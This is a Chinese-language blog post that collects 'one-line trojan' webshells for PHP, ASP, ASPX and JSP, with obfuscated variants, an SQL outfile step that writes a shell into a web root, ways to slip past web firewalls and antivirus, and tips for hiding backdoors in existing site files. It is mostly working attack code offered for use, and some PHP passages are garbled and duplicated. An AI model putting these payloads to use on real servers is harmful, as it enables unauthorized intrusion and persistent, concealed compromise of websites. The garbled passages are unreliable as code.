国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

一句話木馬大全

2年前作者:廾匸0705分類:Toy博客閱讀(51)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了一句話木馬大全。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄
PHP
    普通一句話
    PHP系列
    過狗一句話
    PHP過狗
    幾個(gè)變性的php--過防火墻
    phpv9 高版本拿shell
ASP
    asp 一句話
    ASP過安全狗一句話
    ASPX系列
    aspx一句話
JSP
    過護(hù)衛(wèi)神的
插入一句話容易爆錯(cuò)
    一句話木馬到兩句話木馬的轉(zhuǎn)型!
 一句話免殺:
    一:變形法
支持變異菜刀連接以過安全狗,過啊D 文件掃描的一句話
    ASP
    ASP
    ASPX

PHP


<pre> 
<body>
<? @system($_GET["cc"]); ?>
</body> 
</pre>

//可執(zhí)行命令一句話

普通一句話

<?php eval($_POST[cc123]) ?>


<?php @eval($_POST['cc123']);?>
php的一句話木馬: <?php @eval($_POST['pass']);?>
asp的一句話是:   <%eval request ("pass")%>
aspx的一句話是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

PHP系列

<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?>


<?php $lang = (string)key($_POST);$lang($_POST['xindong']);?>


<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['xindong']);?>


<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["xindong"]);  ?>


<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>    密碼是  -7

過狗一句話

select '<?php @eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/mysql-php/1.php'
<?php $_=""; $_[+$_]++; $_=$_.""; $___=$_[+""];//A $____=$___; $____++;//B $_____=$____; $_____++;//C $______=$_____; $______++;//D $_______=$______; $_______++;//E $________=$_______; $________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O $_________=$________; $_________++;$_________++;$_________++;$_________++;//S $_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______; $________++;$________++;$________++;//R $_____=$_________; $_____++;//T $__=$___.$_________.$_________.$_______.$________.$_____; $__($_("ZXZhbCgkX1BPU1RbMV0p")); ?> <?php $_REQUEST['a']($_REQUEST['b']); ?> <?php $t=$_GET['t']; $tt=$_GET['tt']; $s=
t;$s($REQUEST[′cc123′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=sert$s=
t;$s($REQUEST[′cc123′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=sert$s=
t.$ttt; $s($_REQUEST['cc']);?> <?php $t=$_GET['t']; //t=tt $tt=$_GET['tt']; //tt=as $ttt=$_GET['ttt']; //ttt=s $tttt=$_GET['tttt']; //ttt=ert $s=
t.$ttt.$tttt;$s($REQUEST[′cc′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=tttt$tttt=$GET[′tttt′];//ttt=sert$s=
t.$ttt.$tttt;$s($REQUEST[′cc′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=tttt$tttt=$GET[′tttt′];//ttt=sert$s=
t.
ttt;$s($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=b;$b=$REQUEST[′b′];//b=as;$c=$REQUEST[′c′];//c=sert;$d=$REQUEST[′d′];//d=c;$e=
ttt;$s($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=b;$b=$REQUEST[′b′];//b=as;$c=$REQUEST[′c′];//c=sert;$d=$REQUEST[′d′];//d=c;$e=
a.
d;$e($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=assert;$b=$REQUEST[′b′];//b=a;$d=
d;$e($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=assert;$b=$REQUEST[′b′];//b=a;$d=
b; $d($_REQUEST['cc']); ?>
PHP過狗
<?php if($_POST[x]!=''){$a="base64_decode"; eval($a($_POST[z0]));}?> 密碼:x
<%a=request(“gold”)%><%eval a%>


fuck<?php
eval
($_POST
[a])
?>


<?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?> 密碼 4
該日志目錄不存在或權(quán)限不足,請(qǐng)檢查設(shè)置!<?php
eval
($_POST
[a])
?>

幾個(gè)變性的php–過防火墻

過狗效果都不錯(cuò):

<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['sz']); ?> <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?> <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?>
這個(gè)是90發(fā)的<?php


@$_=“s”.“s”./-/-/“e”./-/-/“r”;


@= / ? ? / ? ? ? / &quot; a &quot; . / ? ? / ? ? ? / _=/*-/*-*/&quot;a&quot;./*-/*-*/ 
=

 /??/???/"a"./??/???/_./-/-*/“t”;


@/ ? ? / ? ? ? / ( _/*-/*-*/( 
/

 ??/???/(/-/-/{"_P"./-/-/“OS”./-/-*/“T”}


[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]);?>
密碼-7

phpv9 高版本拿shell

<?php file_put_contents('c7.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NjMjc4OV0pOz8+')); ?>
…/…/…/…/html/special/cc/index


ASP

asp 一句話

<%execute(request(“cmd”))%>
<%execute request(“1”)%>
ASP一句話16進(jìn)制:┼攠數(shù)畣整爠煥敵瑳∨≡┩愾 密碼a
"%><%Eval(Request(chr(112)))%><%’ p


<%Y=request(“xindong”)%> <%execute(Y)%>


<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“xindong”))%>


<%eval""&(“e”&“v”&“a”&“l(fā)”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&"-"&“5”&")"&")")%>(密碼是-7)

ASP過安全狗一句話

密碼(pass)


<% %>


<%a=request(“zl”)%><%eval a%>

ASPX系列

ASPX一句話的 過安全狗效果不怎么樣

不過我認(rèn)為能支持aspx 百分之8/90支持asp

<%@ Page Language = Jscript %>
<%var/-/-/P/-/-/=/-/-/“e”+“v”+/-/-/
“a”+“l(fā)”+"("+“R”+“e”+/-/-/“q”+“u”+“e”/-/-/+“s”+“t”+
“[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]”+
“,”+"""+“u”+“n”+“s”/-/-/+“a”+“f”+“e”+"""+")";eval
(/-/-/P/-/-/,/-/-/“u”+“n”+“s”/-/-/+“a”+“f”+“e”/-/-/);%> 密碼 -7


<%@ Page Language=“Jscript”%><%eval(Request.Item[“xindong”],“unsafe”);%>


密碼是webadmin

aspx一句話

<%@ Page Language=“Jscript” validateRequest=“false” %><%Response.Write(eval(Request.Item[“w”],“unsafe”));%>

JSP

<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>


select ‘<?php eval($_POST[cmd];?>’ into outfile ‘C:/Inetpub/wwwroot/mysql-php/1.php’

過護(hù)衛(wèi)神的

<%E=request(“1”)%>abc

123456789<%execute E%>

原來代碼是<%execute request(“cmd”)%> 把標(biāo)簽修改替換下來 為

<scriptlanguage=VBScript runat=server>execute request(“cmd”) 這樣就避開了<%,%>符號(hào)!

表中數(shù)據(jù)段限制,一句話木馬也寫不下的情況

網(wǎng)絡(luò)中流傳的最小的木馬代碼是<%eval request("#")%> 如過連這也寫不下怎么辦?

將木馬分開寫就好了!<%Y=request(“x”)%> <%execute(Y)%> 這樣分開寫提交到數(shù)據(jù)庫就沒問題了!

不過,在ACCESS數(shù)據(jù)庫中新增加的數(shù)據(jù)物理位置是在舊數(shù)據(jù)之前的,所以要先寫<%execute(Y)%>部分。寫好后在客戶端寫密碼時(shí)除了填寫"x"以外的任何字符都可以,如果填了"x"就會(huì)出錯(cuò)!

插入一句話容易爆錯(cuò)

例如

Sub unlockPost()


Dim id,replyid,rs,posttable


id=Request(“id”)


replyid=Request(“replyid”)


If Not IsNumeric(id) or id="" Then

寫成

Sub unlockPost(<%eval request("#")%>)


Dim id,replyid,rs,posttable


id=Request(“id”)


replyid=Request(“replyid”)


If Not IsNumeric(id) or id="" Then

就可以了,也可以寫成帶容錯(cuò)語句的格式!!

<%if request(“cmd”)<>""then execute request(“cmd”)%>

一句話木馬到兩句話木馬的轉(zhuǎn)型!

**
**

一句話木馬服務(wù)端原型:<%execute request(“value”)%> ,

變形后:<%On Error Resume Next execute request(“value”)%> ,

至于為什么要用兩句話木馬呢,是由于使我們的后門更加隱蔽.

我也試過用一句話插入WellShell的某個(gè)ASP文件里面,可是訪問時(shí)經(jīng)常出錯(cuò),而插入兩句話木馬服務(wù)端卻可以正常訪問了,對(duì)站點(diǎn)的頁面無任何影響.

這樣就達(dá)到了隱蔽性更強(qiáng)的目的了,他管理員總不會(huì)連自己的網(wǎng)頁文件都刪了吧.

現(xiàn)在我的WellShell都有這樣的后門.選擇要插入兩句話木馬的ASP文件要注意,選一些可以用IE訪問的ASP文件,不要選conn.asp這樣的文件來插入.

當(dāng)然,連接兩句話木馬的客戶端仍然是用一句木馬的客戶端,不用修改.

一句話免殺:

**
**

一:變形法

比如:eval(request("#"))這樣的馬兒呢,一般情況下是不被殺的。但實(shí)際上,經(jīng)常殺毒軟件會(huì)把eval(request列為特征碼。所以我們變形一下

E=request(“id”)


eval(E)

這樣可達(dá)到免殺的目的。

例如:<%execute request(“1”)%> 變形后:

<%E=request(“1”)


execute E%>

當(dāng)然,這種變形是最好做的。

介紹第二種方法:因?yàn)楹芏喙芾韱T很聰明,它會(huì)檢查ASP文件中的execute和eval函數(shù)。所以呢,不管你怎么反編譯,它最終總是要用其中的一個(gè)函數(shù)來解釋運(yùn)行,所以還是被發(fā)現(xiàn)了。好么,我們用外部文件來調(diào)用。建一個(gè)a.jpg或者任何不被發(fā)現(xiàn)的文件后綴或文件名。寫入 execute(request("#"))當(dāng)然,你可以先變形后現(xiàn)放上去。然后在ASP文件中插入

來引用它,即可。

不過,管理員可以通過對(duì)比文件的方式找到修改過的文件,不過這種情況不多。

在WEBSHeLL中使用命令提示

在使用ASP站長(zhǎng)助手6.0時(shí)點(diǎn)擊命令提示符顯示“沒有權(quán)限”的時(shí)候,可以使用ASP站長(zhǎng)助手上傳CMD.exe到你的WEBSHELL目錄(其它目錄也行,把上傳以后的CMD.exe絕對(duì)路徑COPY出來),再修改你的WEBSHELL找到調(diào)用CMD.EXE的代碼。原來的代碼如下

.exec("cmd.exe /c "&DefCmd).stdout.readall

修改為

.exec(“你想上傳的cmd.exe絕對(duì)路徑” /c"&DefCmd).stdout.readall

比如你上傳到的目錄是D:\web\www\cmd.exe,那么就修改成

.exec(“D:\web\www\cmd.exe /c”&DefCmd).stdout.readall

支持變異菜刀連接以過安全狗,過啊D 文件掃描的一句話

實(shí)已經(jīng)不是一句話了,好幾句了都。

繼續(xù)上次的:我使用的一句話的幾種姿態(tài)

這回研究了下PHP,發(fā)一下我使用的一句話(可過文件掃描)。

ASP

<?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

密碼z,支持菜刀連接;支持變異菜刀連接以過安全狗。

另外:

ASP

<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"http://",""""),"*",vbCrlf)
End Function
Execute MorfiCoder(")//z/*/(tseuqer lave") %>

ASPX文章來源地址http://www.zghlxwxcb.cn/news/detail-741157.html

<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); 
%>

到了這里,關(guān)于一句話木馬大全的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • java安全——jsp一句話木馬

    java安全——jsp一句話木馬

    提示:以下是本篇文章正文內(nèi)容,下面案例可供參考 http://localhost:8003/index.jsp?cmd=whoami 不會(huì)回顯執(zhí)行的結(jié)果只能在后臺(tái)打印一個(gè)地址,常用來反彈shell 代碼如下(示例):

    2024年02月11日
    瀏覽(16)
  • 滲透干貨|史上最全一句話木馬

    滲透干貨|史上最全一句話木馬

    PHP //可執(zhí)行命令一句話 普通一句話 PHP系列 過狗一句話 【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料文末免費(fèi)領(lǐng)!----】 幾個(gè)變性的php–過防火墻 過狗效果都不錯(cuò): 密碼-7 phpv9 高版本拿shell ASP asp 一句話 ASP過安全狗一句話 ASPX系列 ASPX一句話的 過安全狗效果不怎么樣 不過我認(rèn)為能

    2024年04月25日
    瀏覽(22)
  • 一句話木馬攻擊復(fù)現(xiàn):揭示黑客入侵的實(shí)戰(zhàn)過程

    一句話木馬攻擊復(fù)現(xiàn):揭示黑客入侵的實(shí)戰(zhàn)過程

    這篇文章旨在用于網(wǎng)絡(luò)安全學(xué)習(xí),請(qǐng)勿進(jìn)行任何非法行為,否則后果自負(fù)。 準(zhǔn)備環(huán)境 OWASP虛擬機(jī) xfp 7與xshell 7 ?? DVWA系統(tǒng)默認(rèn)的賬號(hào)密碼均為:admin/admin? ? 攻擊payload 這個(gè)命令的目的是在服務(wù)器上創(chuàng)建一個(gè)名為 shell.php 的文件,其中包含 PHP 代碼。讓我們逐步分析該命令:

    2024年02月11日
    瀏覽(21)
  • 上傳漏洞(一句話木馬、中國菜刀使用、DVWA文件上傳漏洞利用)

    上傳漏洞(一句話木馬、中國菜刀使用、DVWA文件上傳漏洞利用)

    ? ?可抓包后修改擴(kuò)展名為圖片格式,再上傳可繞過驗(yàn)證。如: ? 可以修改php文件后綴為其他,再上傳。如test.php.xxx ?可對(duì)圖片文件添加一句話木馬,再修改為.php上傳,會(huì)解析為圖片上傳此文件。 ? ?客戶端驗(yàn)證繞過的方法有: ?例: ? 1)木馬分為大馬、小馬和一句話木馬:

    2024年02月11日
    瀏覽(18)
  • C語言:將一句話的單詞進(jìn)行倒置,標(biāo)點(diǎn)不倒置。

    C語言:將一句話的單詞進(jìn)行倒置,標(biāo)點(diǎn)不倒置。

    將 一句話 的 單詞 進(jìn)行 倒置 , 標(biāo)點(diǎn)不倒置 。(字符數(shù)組長(zhǎng)度不超過100) 比如: I like beijing. 經(jīng)過函數(shù)后變?yōu)椋?beijing. like I ? ? ? ? ? ? ? ? ? ?? ?========================================================================= ? ? ? ? ? ? ? ? ? ? ? ? ( 可以 把 兩步順序調(diào)換 ) ? ? ? ? ?

    2024年02月09日
    瀏覽(18)
  • (c語言)將一句話的單詞進(jìn)行倒置,標(biāo)點(diǎn)不倒置(i like beijing.)

    (c語言)將一句話的單詞進(jìn)行倒置,標(biāo)點(diǎn)不倒置(i like beijing.)

    目錄 例子: 思路方法: ?編輯 ?(分板塊)代碼的實(shí)現(xiàn): 一.字符串的獲取(3種簡(jiǎn)單的方法) 1.用gets()函數(shù),即使中間有空格也會(huì)讀取 2.用fgets()函數(shù)? ? ? 3.用scanf(\\\"%[^n]s\\\")讀取也可以達(dá)到同樣的效果 二.字符串倒置代碼的實(shí)現(xiàn): 字符串倒置的代碼實(shí)現(xiàn): ?三.每個(gè)單詞

    2024年02月07日
    瀏覽(17)
  • LCHub:一句話讓 AI 替你開發(fā) App,微軟推出 Power Platform Copilot 低代碼服務(wù)

    LCHub:一句話讓 AI 替你開發(fā) App,微軟推出 Power Platform Copilot 低代碼服務(wù)

    LCHub 3 月 18 日消息,這幾天,GPT-4 接入微軟 Office 全家桶的消息傳遍了互聯(lián)網(wǎng),AI 究竟是會(huì)取代打工人還是輔助打工人,目前仍是個(gè)未知數(shù)。 GPT 能力除了集成在 Microsoft 365 與 Dynamics 365 服務(wù)外,微軟也在 3 月 16 日宣布了?Power Platform Copilot,讓 AI 替程序員開發(fā) App 的功能問世了

    2024年02月15日
    瀏覽(22)
  • 一句話生成長(zhǎng)視頻

    一句話生成長(zhǎng)視頻

    前段時(shí)間,我曾經(jīng)介紹過Imagen Video模型。它能夠在輸入一句話中,生成5~6秒的視頻。而且由于采用了“空間高分辨率模型”和“時(shí)域高分辨率模型”的級(jí)聯(lián)模型,它能夠清晰度在1280×768的高清視頻。具體的介紹可以回看我之前寫的文章: 短視頻模型Imagen Video:藝術(shù)和3D建模大

    2023年04月09日
    瀏覽(20)
  • 一句話畫出動(dòng)漫效果

    一句話畫出動(dòng)漫效果

    ?鏈接: AI Comic Factory - a Hugging Face Space by jbilcke-hf Discover amazing ML apps made by the community https://huggingface.co/spaces/jbilcke-hf/ai-comic-factory 選擇類型: Japanese ?輸入提示詞: 效果如下:

    2024年02月10日
    瀏覽(25)
  • 解封ChatGPT我只用了一句話

    解封ChatGPT我只用了一句話

    文章前言 ChatGPT作為一個(gè)AI語言模型可以幫助使用者生成各種各樣的文字內(nèi)容,目前已被廣泛應(yīng)用于各種語言任務(wù)中,例如:文本生成、機(jī)器翻譯、問答系統(tǒng)等,基于保障使用者權(quán)益和維護(hù)良好的價(jià)值觀,官方限制ChatGPT不能回答不當(dāng)言論(攻擊或侮辱性)、敏感內(nèi)容和帶有偏見的

    2024年02月16日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包